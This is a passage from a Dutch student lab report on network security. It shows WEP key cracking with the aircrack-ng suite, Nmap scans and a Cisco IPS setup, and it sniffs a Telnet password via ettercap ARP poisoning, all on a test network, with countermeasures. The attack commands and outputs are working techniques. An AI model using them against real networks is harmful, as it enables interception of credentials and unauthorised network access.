interface 0 mee. Deze monitor interface moet je zelf aanmaken. Dit kan je doen door het volgende
commando in te geven: airmon-ng start wlan0.
8.1.2.2 Aircrack-ng
Commando om WEP-frames te analyseren: aircrack-ng wepdata01.cap
Nadat je al de frames verzameld hebt, kan je je PCAP bestand door aircrack-ng laten analyseren.
Omdat het hier gaat om een testnetwerk en omdat er momenteel geen data over dit netwerk
gestuurd worden, is het niet mogelijk om de WEP-key en keystream te kraken.
Resultaat:
Opening wepdata2-01.cap
Read 171487 packets.
# BSSID ESSID Encryption
1 42:D9:98:60:C3:BC testnetwerk WEP (40226 IVs)
Choosing first network as target.
Opening wepdata2-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 40375 ivs.
KEY FOUND! [ AF:AF:AF:AF:AF ]
Decrypted correctly: 100%
8.2 ARP Replay with Fake authenticaton Bij er ARP replay aanval zullen er data gegenereerd worden op het draadloos netwerk. Deze data
zullen dan kunnen geanalyseerd worden. In minder dan vijf minuten kan je op deze manier een WEP-
key vinden.
Omdat er bij WEP geen replay detectie is, kan elke frame die ontvangen wordt terug op het netwerk
gestuurd worden. Deze teruggestuurde frames zullen weer behandeld worden als nieuwe frames.
Een ARP replay aanval zal het verkeer op het netwerk analyseren en zoeken naar broadcast ARP
frames. Van deze frames zullen de geadresseerden veranderd worden en dan teruggestuurd worden
naar de AP. De AP zal deze frame dan decrypteren, weer encrypteren met een IV en deze frame dan
weer uitsturen. Door dit vele malen opnieuw te doen, zal er veel verkeer gegenereerd worden.
De ARP-requests die je stuurt naar de AP moeten komen van een geauthentiseerde client, anders
aanvaardt hij de frames niet. Je zal dus eerst een connectie maken met de AP waardoor de AP denkt
dat je een betrouwde client bent. Dit kan je doen met airplay-ng.
95
8.2.1 Aanval met de aircrack-ng suite De aircrack-ng suite zal gebruikt worden om deze aanval uit te voeren en hierdoor dan de key te
vinden.
8.2.1.1 Monitor mode
Voor we beginnen moeten we de adapter in monitor mode plaatsen.
Commando:
airmon-ng start wlan0
Resultaat:
Interface Chipset Driver
wlan0 Intel 1030 iwlwifi - [phy0]
(monitor mode enabled on mon0)
8.2.1.2 De capture starten
Nadat we de adapter in monitor mode plaatsen zullen we de capture starten. Deze laten we
doorheen de volgende stappen lopen, zodat we op het einde genoeg data verzameld hebben om te
kunnen analyseren met aircrack-ng.
Commando:
airodump-ng --channel 6 --bssid 42:D9:98:60:C3:BC --write wepdata2 mon0
Resultaat:
CH 6 ][ BAT: 2 hours 35 mins ][ Elapsed: 6 mins ][ 2014-01-14 11:22
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
42:D9:98:60:C3:BC -65 100 3705 63920 2 6 54e. WEP WEP OPN testnetwerk
BSSID STATION PWR Rate Lost Frames Probe
42:D9:98:60:C3:BC CC:08:E0:20:F8:74 -37 1 -54 2 141614
8.2.1.3 Fake authenticatie
Nu onze capture bezig is, openen we een nieuw venster waarin we een fake authenticatie aanval
zullen starten. We zullen dit doen door airplay-ng te gebruiken.
Commando:
aireplay-ng --fakeauth 1000 -q 10 -a 42:D9:98:60:C3:BC -h CC:08:E0:20:F8:74
mon0
Resultaat:
The interface MAC (4C:EB:42:94:81:C1) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether CC:08:E0:20:F8:74
11:17:44 Waiting for beacon frame (BSSID: 42:D9:98:60:C3:BC) on channel 6
11:17:44 Sending Authentication Request (Open System) [ACK]
11:17:44 Authentication successful
11:17:44 Sending Association Request [ACK]
11:17:44 Association successful :-) (AID: 1)
11:17:54 Sending keep-alive packet [ACK]
11:18:04 Sending keep-alive packet [ACK]
96
8.2.1.4 ARP replay aanval
Nadien doen we een ARP-replay aanval om zo verkeer op het netwerk te genereren.
Commando:
aireplay-ng --arpreplay -b 42:D9:98:60:C3:BC -h CC:08:E0:20:F8:74 mon0
Resultaat:
The interface MAC (4C:EB:42:94:81:C1) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether CC:08:E0:20:F8:74
11:23:44 Waiting for beacon frame (BSSID: 42:D9:98:60:C3:BC) on channel 6
Saving ARP requests in replay_arp-0114-112344.cap
You should also start airodump-ng to capture replies.
Read 375 packets (got 124 ARP requests and 70 ACKs),
sent 104 packets...(501 ppsRead 513 packets (got 194 ARP requests and 106
ACKs),
sent 153 packets...(497 ppRead 640 packets (got 261 ARP requests and 142
ACKs),
sent 204 packets...(500 ppRead 802 packets (got 365 ARP requests and 195
ACKs),
sent 254 packets...(500 ppRead 968 packets (got 466 ARP requests and 248
ACKs),
sent 304 packets...(500 ppRead 1128 packets (got 565 ARP requests and 300
ACKs),
sent 354 packets...(500 pRead 1290 packets (got 667 ARP requests and 354
ACKs)
8.2.1.5 Aircrack-ng
Tijdens de ARP replay aanval, kunnen we het wepdata.cap bestand laten analyseren door aircrack-ng
om achter de WEP-key te komen. Moest dit nog niet lukken, wacht je beter nog even en dan laat je
aircrack-ng terug hetzelfde bestand analyseren.
Commando:
aircrack-ng wepdata2-01.cap
Resultaat:
Opening wepdata2-01.cap
Read 171487 packets.
# BSSID ESSID Encryption
1 42:D9:98:60:C3:BC testnetwerk WEP (40226 IVs)
Choosing first network as target.
Opening wepdata2-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 40375 ivs.
KEY FOUND! [ AF:AF:AF:AF:AF ]
Decrypted correctly: 100%
8.2.2 WEP Hacking Tegenmaatregels Zoals hierboven aangetoond is, heeft WEP zeer veel kwetsbaarheden. Het is dus een
encryptie methode die je het best niet gebruikt op je draadloos netwerk. Als je toch WEP gebruikt,
dan kan je evengoed geen encryptie toepassen op je netwerk.
97
Case 1: Scannen en IPS instellen 1 Inleiding Scannen is een belangrijk onderdeel voor een hacker. De hacker zal hiermee kunnen identificeren
welke en hoeveel toestellen aanwezig zijn op het netwerk. Hij zal ook te weten komen welke services
aanwezig zijn op welke hosts.
2 Topologie Diagram
3 IP-adressen tabel In de volgende tabel vindt u een overzicht van hoe de toestellen verbonden zijn met elkaar en welke
IP-adressen ze gekregen hebben.
4 Objectieven Testnetwerk maken
Netwerk scannen
Intrusion Prevention System instellen
Intrusion Prevention System uittesten
Toestel Interface IP-adres Subnet Mask Default Gateway
Switchport
Internet Serial 0/0/0 10.1.1.2 255.255.255.252 / /
Serial 0/0/1 10.2.2.2 255.255.255.252 / /
InternNetwerk Serial 0/0/0 10.1.1.1 255.255.255.252 / /
Gigabyte 0/1 192.168.1.1 255.255.255.0 / Switch Intern fa0/1
ExternNetwerk Serial 0/0/1 10.2.2.1 255.255.255.252 / /
Gigabyte 0/1 192.168.3.1 255.255.255.0 / Switch Extern fa0/1
NetwerkAdmin NIC 192.168.1.3 255.255.255.0 192.168.1.1 Switch Intern fa0/3
Scanner NIC 192.168.3.3 255.255.255.0 192.168.3.1 Switch Extern fa0/3
98
5 Stappenplan In dit stappenplan zal besproken worden hoe je een netwerk kan opstellen waarin je duidelijk kan
zien wat de voordelen zijn van een Intrusion Prevention System. Er zal ook besproken worden hoe en
waarom je bepaalde scans uitvoert op het netwerk.
5.1 Stap 1: Testnetwerk opstellen en uittesten In deze stap zal besproken worden hoe je het testnetwerk kan opstellen en daarna kan uittesten. We
hebben gewerkt met statische adressering en met OSPF. OSPF zorgt ervoor dat er connectie mogelijk
is tussen de verschillende netwerken.
Om het testnetwerk uit te stellen zal er vanaf de router van het extern netwerk een ICMP bericht
gestuurd worden naar de router van het interne netwerk, als dit succesvol is, is de configuratie van
het testnetwerk geslaagd.
5.1.1 IP-adressen instellen Om de IP-adressen in te stellen op de routers kan je de volgende commando’s gebruiken:
enable
conf t
hostname R1
interface serial 0/0/0
ip address 10.1.1.1 255.255.255.252
clock rate 64000
no shut
interface gig 0/1
ip address 192.168.1.1 255.255.255.0
no shut
end
copy run start
Deze commando’s kan je gebruiken om zo bij elke router de IP-adressen toe te toe te wijzen. Je moet
wel de IP-adressen en interfaces veranderen per router.
5.1.2 OSPF instellen Om ervoor te zorgen dat er connectiviteit tussen de afzonderlijke netwerken mogelijk is stellen we
OSPF in:
en
conf t
router ospf 1
network 10.1.1.0 0.0.0.3 area 0
network 192.168.1.0 0.0.0.255 area 0
end
copy run start
Je zal dit net zoals bij de IP-adressen moeten herhalen bij elke router. Maar dan wel met de andere
netwerken.
99
5.1.3 Testnetwerk uittesten Om het testnetwerk uit te testen hebben we ICMP Echo Requests (ping) verstuurd van de router in
het externe netwerk naar de router van het interne netwerk. Als er van de router van het interne
netwerk ICMP Echo Reply’s terugkomen dan is er connectiviteit.
Commando:
ping 10.1.1.1
Resultaat:
5.2 Stap 2: Netwerk scannen Als hacker zal je proberen om het netwerk te scannen om zo veel gegevens te kunnen vergaren over
het netwerk. Enkele verschillende scans die je kan uitvoeren zijn:
een ARP-scan
een ping-sweep
een TCP poortscan
een Intense scan
5.2.1 ARP-scan Een ARP-scan zal gebruik maken van het ARP-protocol. Bij een ARP-scan zullen er ARP-requests
gestuurd worden voor elke host in het netwerk. Al de hosts die aanwezig zijn zullen antwoorden met
een ARP-reply. Deze ARP-reply bevat hun MAC-adres.
Commando:
arp-scan 192.168.1.1
Resultaat:
Initiating ARP Ping Scan at 16:10
Scanning 192.168.1.1 [1 port]
MAC Address: 44:03:A7:5B:10:81 (Cisco)
Completed ARP Ping Scan at 16:10, 0.58s elapsed (1 total hosts)
100
5.2.2 Ping-sweep Met een ping-sweep zal je naar elke host in het netwerk een ping sturen. Dit is een ICMP Echo
request. Als je een ICMP Echo reply terugkrijgt dan weet je dat dat toestel aanwezig is op het
netwerk.
Commando:
ping 192.168.1.1
Resultaat:
5.2.3 TCP poortscan Met een TCP poortscan zal je een connectie proberen te op te stellen met verschillende poorten op
al de toestellen in een netwerk. De poorten die de connectie aanvaarden, dus diegene dat in
“listening” state zijn zullen de connectie aanvaarden. Hiermee kan besluiten dat die poorten open
staan. Achter elke open poort bevindt zich een service aan het luisteren is.
De poortscan zal uitgevoerd worden met de tool Nmap.
Commando SYN stealth scan:
nmap –sS 192.168.1.1
Resultaat:
Initiating SYN Stealth Scan at 16:10
Scanning 192.168.1.1 [1000 ports]
Not shown: 995 closed ports
PORT STATE SERVICE
23/tcp open telnet
2002/tcp open telnet
4002/tcp open tcpwrapped
6002/tcp open tcpwrapped
9002/tcp open tcpwrapped
MAC Address: 44:03:A7:5B:10:81 (Cisco)Completed SYN Stealth Scan at 16:10,
0.86s elapsed (1000 total ports)
101
5.2.4 Intense scan Om echt alles te weten te komen over een bepaalde host kan je een intense scan uitvoeren. Deze
scan heeft zeer veel kans om gelogd te worden door het systeem. Om de reden dat er bij deze scan
zeer veel verschillende methodes uitgevoerd worden om te scannen.
Commando:
nmap -T4 -A -v 192.168.1.1
Resultaat:
Starting Nmap 6.40 ( http://nmap.org ) at 2013-12-18 16:10 Romance
(standaardtijd)
NSE: Loaded 110 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 16:10
Scanning 192.168.1.1 [1 port]
Completed ARP Ping Scan at 16:10, 0.58s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:10
Completed Parallel DNS resolution of 1 host. at 16:10, 16.52s elapsed
Initiating SYN Stealth Scan at 16:10
Scanning 192.168.1.1 [1000 ports]
Discovered open port 23/tcp on 192.168.1.1
Discovered open port 4002/tcp on 192.168.1.1
Discovered open port 9002/tcp on 192.168.1.1
Discovered open port 2002/tcp on 192.168.1.1
Discovered open port 6002/tcp on 192.168.1.1
Completed SYN Stealth Scan at 16:10, 0.86s elapsed (1000 total ports)
Initiating Service scan at 16:10
Scanning 5 services on 192.168.1.1
Completed Service scan at 16:10, 0.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.1
NSE: Script scanning 192.168.1.1.
Initiating NSE at 16:10
Completed NSE at 16:11, 15.04s elapsed
Nmap scan report for 192.168.1.1
Host is up (0.00022s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
23/tcp open telnet
2002/tcp open telnet
4002/tcp open tcpwrapped
6002/tcp open tcpwrapped
9002/tcp open tcpwrapped
MAC Address: 44:03:A7:5B:10:81 (Cisco)
OS details: Cisco 836, 890, 1751, 1841, 2800, or 2900 router (IOS 12.4 -
15.1), Cisco Aironet AIR-AP1141N WAP (IOS 12.4)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: OS: IOS; Device: router; CPE: cpe:/o:cisco:ios
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.1.1
NSE: Script Post-scanning.
Read data files from: C:\Program Files (x86)\Nmap
102
OS and Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.81 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1016 (40.938KB)
5.3 Stap 3: Intrusion Prevention System Een Intrusion Prevention System (IPS)
is een systeem waarmee je het
netwerkverkeer kan monitoren en
services mee kan blokkeren als ze door
de IPS komen. Een IPS is een toestel
waar al het netwerkverkeer door moet
vooraleer het verkeer het interne
netwerk zal bereiken.
Wij hebben een IPS ingesteld op de router van het interne netwerk.
5.3.1 Intrusion Prevention System instellen Om deze IPS in te stellen hebben we gebruik gemaakt van Cisco Configuration Professional (CCP).
CCP is een tool waarmee je vele zaken kan doen, van monitoring tot het instellen van
netwerkapparatuur. Wij hebben hiermee een IPS ingesteld.
5.3.1.1 CCP instellen
Om CCP te kunnen gebruiken moet je enkele zaken configureren op de toestellen dat je door CCP
wilt laten configureren.
Je moet een gebruiker aanmaken met “privilege level 15” en met een wachtwoord. Je moet dan
toelaten dat je apparaat kan gevonden worden door CCP, dit doe je met het commando “ip http
server”. Wat je ook moet configureren is dat als CCP een connectie wil opstellen met de router dat er
een lokale gebruikersnaam en wachtwoord moet ingegeven worden.
Commando’s om CCP te kunnen gebruiken:
en
conf t
Username <username> privilege <0-15> password 0 <passwoord>
Ip http server
Ip http authentication local
end
copy run start
Als CCP opgestart is moet je eerst je toestellen laten “discoveren”. Dit is de laatste stap in het proces.
Als dit lukt kan je de toestellen via CCP monitoren en aanpassen.
103
5.3.1.2 IPS instellen en Signature aanpassen
Als CCP goed opgestart is, ga je naar de tab “Configure” en dan naar de map Security. In deze map
staat er Intrusion Prevention. Als je hierop klikt krijg je het volgende scherm.
Figuur 5-1 CCP Intrusion Prevention System
Op dit scherm moet je kiezen voor “Launch IP Role Wizard”, de wizard zal dan starten. Deze wizard
zal he helpen om een IPS te configureren.
Figuur 5-2 CCP Intrusion Prevention System
In dit scherm krijg je informatie over al de zaken die je zal moeten beslissen en die je zal moeten
invullen bij het instellen van een IPS.
104
Figuur 5-3 CCP Intrusion Prevention System
Hier zal je moeten kiezen op welke interfaces de IPS ingesteld wordt. Je zal ook kiezen of hij moet
werken met verkeer dat binnenkomt op die interface of het verkeer dat naar buiten gaat. Door
inbound te kiezen bij beide interfaces laat je toe om het verkeer dat van het interne netwerk en van
het Internet komt te controleren.
Figuur 5-4 CCP Intrusion Prevention System
105
In het venster van “Signature and Public key” klik je op de drie puntjes naast “signature file”. Een IPS
werkt met signatures, deze signatures zullen gebruikt worden om het verkeer na te kijken. Signatures
moet je via TFTP op de router plaatsen.
Figuur 5-5 CCP Intrusion Prevention System
Bij “Configure Public Key” zal je de naam en de Public Key zelf moeten ingeven.
Naam: realm-cisco.pub
Pubilc Key:
30820122 300D0609 2A864886 F70D0101 01050003 82010F00 3082010A 02820101
00C19E93 A8AF124A D6CC7A24 5097A975 206BE3A2 06FBA13F 6F12CB5B 4E441F16
17E630D5 C02AC252 912BE27F 37FDD9C8 11FC7AF7 DCDD81D9 43CDABC3 6007D128
B199ABCB D34ED0F9 085FADC1 359C189E F30AF10A C0EFB624 7E0764BF 3E53053E
5B2146A9 D7A5EDE3 0298AF03 DED7A5B8 9479039D 20F30663 9AC64B93 C0112A35
FE3F0C87 89BCB7BB 994AE74C FA9E481D F65875D6 85EAF974 6D9CC8E3 F0B08B85
50437722 FFBE85B9 5E4189FF CC189CB9 69C46F9C A84DFBA5 7A0AF99E AD768C36
006CF498 079F88F8 A3B3FB1F 9FB7B3CB 5539E1D1 9693CCBB 551F78D2 892356AE
2F56D826 8918EF3C 80CA4F4D 87BFCA3B BFF668E9 689782A5 CF31CB6E B4B094D3
F3020301 0001
106
Figuur 5-6 CCP Intrusion Prevention System
In het volgende scherm klik je op de drie puntjes die naast “Config Location” staan. Dan krijg je dit
scherm. In dit scherm zal je beslissen op welke plaats op de router je de signature wil opslaan.
Figuur 5-7 CCP Intrusion Prevention System
Bij “Chose Category” kies je voor “basic”, we kiezen hiervoor omdat we de IPS minder lang duurt om
te implementeren en het vergt minder CPU gebruik en flash memory van de router.
107
Figuur 5-8 CCP Intrusion Prevention System
Als volgt krijg je een overzicht van al de commando’s die je anders manueel zou moeten toepassen
op de router.
Figuur 5-9 CCP Intrusion Prevention System
In dit overzicht kan je zien op welke interface in welke richting de IPS geactiveerd is.
108
Figuur 5-10 CCP Intrusion Prevention System
Dit is een overzicht van de beschikbare signatures. Zoals je kan zien zijn er al signatures die
automatisch aanstaan en enkele die nog niet aan staan.
Figuur 5-11 CCP Intrusion Prevention System
We zullen een nieuwe signature definiëren en die dan uittesten. We zullen de signature toepassen
die ICMP Echo Requests zal kunnen identificeren.
109
Figuur 5-12 CCP Intrusion Prevention System
We hebben deze signature aangezet en als volgt hebben we met de rechtermuisklik geklikt op de
signature. In dat menu dat verschijnt kies je voor “Actions…”.
Figuur 5-13 CCP Intrusion Prevention System
Bij actions kan je kiezen wat er gebeurt als er aan de signature voldaan wordt.
Wij hebben ervoor gekozen om de aanvaller tegen te houden, een alert te produceren en de TCP
connectie te resetten. Hierdoor zal de ICMP Echo Request tegengehouden worden door de IPS.
110
Figuur 5-14 CCP Intrusion Prevention System
Als al het vorige gedaan is klik je op “Apply Changes”, normaal zou er nu bij “Enabled” een vinkje
moeten staat. Hiermee weet je dat je je signature goed ingesteld hebt.
5.3.1.3 Logging van de IPS instellen
Als je je signature configureert kan je kiezen om een alert te genereren. Je kan ook configureren dat
die alert naar je computer wordt gestuurd.
Om logging in te stellen ga je naar de Configure tab. Dan ga je naar router en als volgt kies je voor
logging. Je zou een scherm moeten krijgen als deze:
Figuur 5-15 CCP Intrusion Prevention System
111
Hierbij zal je kiezen om de logberichten door te sturen naar de computer met het IP-adres
192.168.1.1. En dit van al de berichten tot op het niveau van debugging. In een echte omgeving
wordt die meestal niet gedaan, omdat het dan echt wel veel berichten zijn, die naar je computer
gestuurd worden. Dit zorgt voor extra belasting in het netwerk.
5.3.1.4 IPS uittesten
Als laatste zullen we de IPS uittesten en zien of deze de ICMP Requests tegen houdt. Dit zullen we
doen door de router waar de IPS op geïnstalleerd staat te pingen.
Commando:
ping 192.168.1.1
Resultaat:
In CCP kan je enkele statistieken nagaan dat je meer uitleg geven over hoe de IPS functioneert.
Figuur 5-16 CCP Intrusion Prevention System
Zoals te zien is zijn er 8 ICMP Echo requests doorgestuurd naar de IPS. Je kan zien dat de “source IP
Address” 192.168.3.3:8 is, dit is omdat een Echo-request verstuurd wordt op ICMP poort 8 en
toekomt op ICMP poort 0.
Hierna hebben we met Nmap een intense scan uitgevoerd om na te gaan dat dit nog andere
signatures zou triggeren.
112
Figuur 5-17 CCP Intrusion Prevention System
Zoals te zien is, zijn er door de Intense Nmap scan ook de signatures voor een TCP SYN/FIN pakket en
TCP NULL pakket getriggerd. Omdat er hiervoor enkel het event “procedure-alert” gekozen is zal dit
pakket wel doorgelaten worden maar er zal wel een alert gegenereerd worden.
6 Conclusie Er zijn vele verschillende soorten scannen beschikbaar die je in een netwerk kan uitvoeren. Om
ervoor te zorgen dat deze scans geen resultaat opleveren kan je als netwerkbeheerder een IPS
instellen. Met deze IPS kan je dus al het verkeer filteren en dus ook al het slechte verkeer er uit
halen.
Er zijn wel enkele zaken waar je rekening moet mee houden. Er zijn applicaties die ICMP Echo
requests nodig hebben om te kunnen functioneren. Dus vooraleer je een IPS instelt moet je nagaan
welke noden er zijn in je netwerk en dan een gulden middenweg kiezen tussen de beveiliging en de
functionaliteit.
113
Case 2: Netwerkverkeer afluisteren 1 Inleiding In veel bedrijven heb je de mogelijkheid om je laptop mee te nemen in een vergaderzaal. Als je dan
even alleen gelaten wordt en er is niemand die let op jou, zou je kunnen binnenbreken in de
netwerktoestellen door netwerkverkeer af te luisteren. Welbepaald het Telnet protocol.
Telnet is een protocol dat je als netwerkadministrator beter niet gebruikt omdat, alles wat je intypt in
je Telnet-sessie in niet geëncrypteerd tekst doorstuurt. Je zou als hacker dus alles kunnen lezen wat
er getypt wordt, als je de verbinding afluistert. De pakketten zullen wel enkel te zien zijn op het
toestel dat de pakketten verstuurd en op het toestel dat de pakketten ontvangt. Als jij de pakketten
toch wilt kunnen ontvangen kan je twee zaken doen:
MAC table flooding
ARP poisoning
Deze twee manieren zullen verder in deze case besproken worden.
2 Topologie Diagram De topologie die hieronder volgt is een logische topologie zoals die in een echt netwerk kan zijn. De
HoofdRouter is verbonden met de HoofdSwitch. Waarna de HoofdSwitch in verbinding zal staan met
de afzonderlijke switches waar dan de toestellen aan verbonden zijn.
Figuur 2-1 Logische topologie
114
3 IP Adressen Tabel In de volgende tabel vindt u een overzicht van hoe de toestellen verbonden zijn met elkaar en welke
IP-adressen ze gekregen hebben. De HoofdRouter is een DHCP server.
Uitleg bij de afkortingen:
VS: VergaderzaalSwitch
HS: HoofdSwitch
AS: AdministratorSwitch
NA: NetwerkAdministrator
Toestel Interface IP-adres Subnet Mask Default Gateway
Switchport
HoofdRouter Gig0/0 Aangeleerd via DHCP
Gig0/1 192.168.1.1 255.255.255.0 / HS Gig0/1
Hoofdswitch / / / / /
VS / / / / HS fa0/1
AS / / / / HS fa0/2
Hacker NIC DHCP 192.168.1.3
255.255.255.0 192.168.1.1 VS fa0/1
NA NIC DHCP 192.168.1.2
255.255.255.0 192.168.1.1 AS fa/01
4 Objectieven Testnetwerk maken
Netwerk scannen
ARP poisoning toepassen en Telnet pakketten afluisteren
MAC table flooding toepassen en Telnet pakketten afluisteren
5 Stappenplan In dit stappenplan zal besproken worden hoe je het netwerk kan opstellen waar de aanval op
uitgevoerd word. Er zal ook besproken worden hoe je ARP poisoning kan toepassen en hierdoor de
Telnet pakketten kan afluisteren. Als laatste zal MAC table flooding uitgelegd worden en hoe dit je
kan helpen om de Telnet pakketten kan afluisteren.
5.1 Stap 1: Testnetwerk opstellen en uittesten Om het testnetwerk op te stellen zal je een DHCP server moeten configureren en IP-adressen
instellen op de HoofdRouter. Je zal ook een default-route moeten instellen op de HoofdRouter zodat
al de pakketten die de HoofdRouter ontvangt en die niet bestemd zijn voor de HoofdRouter zelf,
doorgestuurd worden naar hun bestemming op het internet.
Om het testnetwerk uit te testen kan je een ping naar de HoofdRouter uitvoeren van één van de
toestellen die via DHCP een IP-adres zouden moeten krijgen.
115
5.1.1 IP-adressen en een default-route instellen op de HoofdRouter Om ervoor te zorgen dat de HoofdRouter kan gebruikt worden om te beheren via Telnet zal je een IP-
adres moeten instellen op de HoofdRouter. Je zal hiervoor ook een console, enable en Telnet
wachtwoord moeten instellen.
Commando’s om een IP-adres in te stellen:
enable
conf t
hostname R1
interface gig 0/0
ip address dhcp
no shutdown
interface gig 0/1
ip address 192.168.1.1 255.255.255.0
no shutdown
end
copy run start
Commando’s om een console, enable en Telnet wachtwoord in te stellen:
enable
conf t
enable secret cisco123
line console 0
password ciscoconpass
exit
line vty 0 4
password cisco
exec-timeout 0 5
end
copy run start
Commando’s om een default route in te stellen:
enable
conf t
ip route 0.0.0.0 0.0.0.0 gig 0/0
end
copy run start
5.1.2 DHCP server configureren Een DHCP server is een server die IP-adressen zal toewijzen aan de toestellen die in je netwerk
aanwezig zijn.
Commando’s om een DHCP server in te stellen:
enable
conf t
ip dhcp pool DHCP
network 192.168.1.0
default-router 192.168.1.1
exit
ip dhcp excluded-address 192.168.1.1
end
copy run start
116
5.1.3 Testnetwerk uittesten Om na te gaan dat je DHCP server werkt kan je op de HoofdRouter het commando sh ip dhcp
binding uitvoeren, dit commando zal je laten zijn hoeveel en aan wie hij IP-adressen uitgedeeld
heeft. Om het testnetwerk uit te testen kan je eerst nakijken of je een IP-adres gekregen hebt van de
DHCP server. Als volgt kan je een ping uitvoeren naar de HoofdRouter om na te gaan dat je connectie
hebt met de HoofdRouter.
Commando op de HoofdRouter om na te gaan aan wie hij welke IP-adressen heeft uitgedeeld:
sh ip dhcp binding
Resultaat:
Figuur 5-1 Commando sh ip dhcp binding
Commando om na te gaan dat je een IP-adres gekregen hebt:
ipconfig
Resultaat:
Figuur 5-2 Commando ipconfig
Commando om na te gaan dat je connectie hebt met de HoofdRouter:
ping 192.168.1.1
Resultaat:
Figuur 5-3 Commando ping 192.168.1.1
Als dit allemaal in orde is, kunnen we overgaan naar stap 2. Als dit niet in orde is moet je je
configuratie op de HoofdRouter nakijken met het commando show running config.
117
5.2 Stap 2: Netwerk scannen Als je je connecteert met het netwerk en je wil weten op welke apparaten er Telnet aanstaat, dus op
welk toestel Telnet geconfigureerd staat, kan je een poortscan uitvoeren. Deze poortscan kan je
uitvoeren met Nmap. Meer informatie over poortscans kan je terugvinden in de bijlage Scanning.
Als je het resultaat van de poortscan analyseert kan je hieruit afleiden dat er zich een router bevindt
achter het IP-adres 192.168.1.1, op deze router is poort 23 open. Dit is de poort dat Telnet gebruikt
voor de communicatie. Achter het IP-adres 192.168.1.2 bevindt zich een Dell computer. Het IP-adres
192.168.1.3 is je eigen computer.
Commando om een poortscan uit te voeren met Nmap:
nmap –sS 192.168.1.0/24
Resultaat:
Starting Nmap 6.40 ( http://nmap.org ) at 2013-12-21 14:12 Romance Standard
Time
Nmap scan report for 192.168.1.1
Host is up (0.021s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
443/tcp open https
992/tcp open telnets
8080/tcp open http-proxy
8443/tcp open https-alt
MAC Address: 7C:03:D8:C2:31:B8 (unknwown)
Nmap scan report for 192.168.1.2
Host is up (0.0060s latency).
All 1000 scanned ports on 192.168.1.2 are closed
MAC Address: 24:B6:FD:4E:6F:BF (Dell)
Nmap scan report for 192.168.1.3
Host is up (0.0060s latency).
All 1000 scanned ports on 192.168.1.3 are closed
MAC Address: B8:27:EB:3C:05:97 (unknown)
Nmap done: 256 IP addresses (6 hosts up) scanned in 36.97 seconds
118
5.3 Stap 3: ARP poisoning toepassen en Telnet verkeer afluisteren De pakketten die via Telnet verstuurd worden kunnen enkel gezien worden op de computer die de
pakketten verzendt en het toestel die ze ontvangt. In dit geval is het de NetwerkAdministrator die de
pakketten zal versturen en de HoofdRouter die ze zal ontvangen. Door ARP poisoning toe te passen
kan je al het verkeer dat van de NetwerkAdministrator naar de HoofdRouter stuurt, omleiden via uw
eigen toestel. Hierdoor kan je de pakketten van Telnet afluisteren.
5.3.1 ARP Poisoning Bij ARP poisoning gebruik je het ARP protocol om op die manier al de gegevens via jouw toestel om
te leiden. Dit gebeurt in 3 stappen.
Eerst zal je een ARP reply sturen naar de router om zo de router te doen geloven dat jij de
netwerkadministrator bent.
Ten tweede stuur je een ARP reply naar de computer van de netwerkadministrator om aan
zijn computer te laten geloven dat jij de router bent.
Als laatste maak je gebruik van IP forwarding. Hierdoor zal al het verkeer dat voorbij je
toestel passeert naar de router doorgestuurd worden, waardoor de netwerk administrator
niet weet dat er afgeluisterd wordt.
Figuur 5-4 ARP-poisoning
bron: http://www.watchguard.com/infocenter/editorial/135324.asp,
http://www.watchguard.com/archive/files/images/ARPpoison3.jpg
119
5.3.2 ARP Poisoning met Ettercap Om de ARP poison aanval uit te voeren kan je de tool Ettercap gebruiken. Dit is een tool die je toelaat
om aan ARP poisoning te doen en daarna de netwerkverbinding af te luisteren. Ettercap laat ook toe
om daarna de verbinding tussen de netwerk administrator en de hoofdrouter te herstellen.
Commando om ettercap te starten: ettercap –T –M arp:remote /192.168.1.1/ /192.168.1.2/
Resultaat:
Figuur 5-5 Opstarten van ettercap
Hierna zullen de pakketten die van de netwerk administrator naar de hoofdrouter gaan en
omgekeerd beginnen te verschijnen. Door de volgende stroom van pakketten te analyseren kan je
afleiden dat het enable wachtwoord cisco123 is. Dit kan je weten omdat er “Password:” staat en
eens dat ingegeven is staat er “R#” wat wil zeggen dat het enable wachtwoord de juiste is.
120
Figuur 5-6 Pakketten vergreken met ettercap
121
5.4 Stap 4: MAC table flooding MAC table flooding is een andere manier om al het netwerkverkeer af te luisteren. Door MAC table
flooding toe te passen zorg je ervoor dat een switch zal opereren als een HUB waardoor deze al de
pakketten die hij ontvangt zal broadcasten over het netwerk.
Een switch weet aan de hand van het MAC-adres naar waar hij de pakketten moet sturen. Een switch
zal al de aangeleerde MAC-adressen bijhouden in een MAC-table. Als hacker zal je proberen deze
MAC-table vol te steken met MAC-adressen waardoor de switch al de pakketten die hij ontvangt zal
broadcasten op al de poorten. Hierdoor ontvang je als hacker ook het gewenste Telnet verkeer.
We hebben dit uitgetest op een 2960 cisco switch en dit is niet
gelukt omdat deze switch niet toelaat dat zijn MAC-table helemaal
vol loopt. Hij zal altijd 40 adressen overhouden en hij zal geen
nieuwe adressen meer aanleren.
Het commando macof zal heel rap honderden mac-adressen doorsturen naar de switch.
Commando voor MAC-adressen in switch te steken:
macof
Resultaat:
122
6 Tegenmaatregel tegen afluisteren van het netwerk Er zijn drie maatregelen die je kan nemen om ervoor te zorgen dat de methodes van hiervoor niet
uitgevoerd kunnen worden.
6.1 Switchport port security Je kan switchport security instellen en ervoor zorgen dat er maar een maximum aantal MAC-
adressen aangeleerd kunnen worden op één switchpoort.
Met de volgende commando’s stel je in dat er een maximum van 10 MAC-adressen per poort
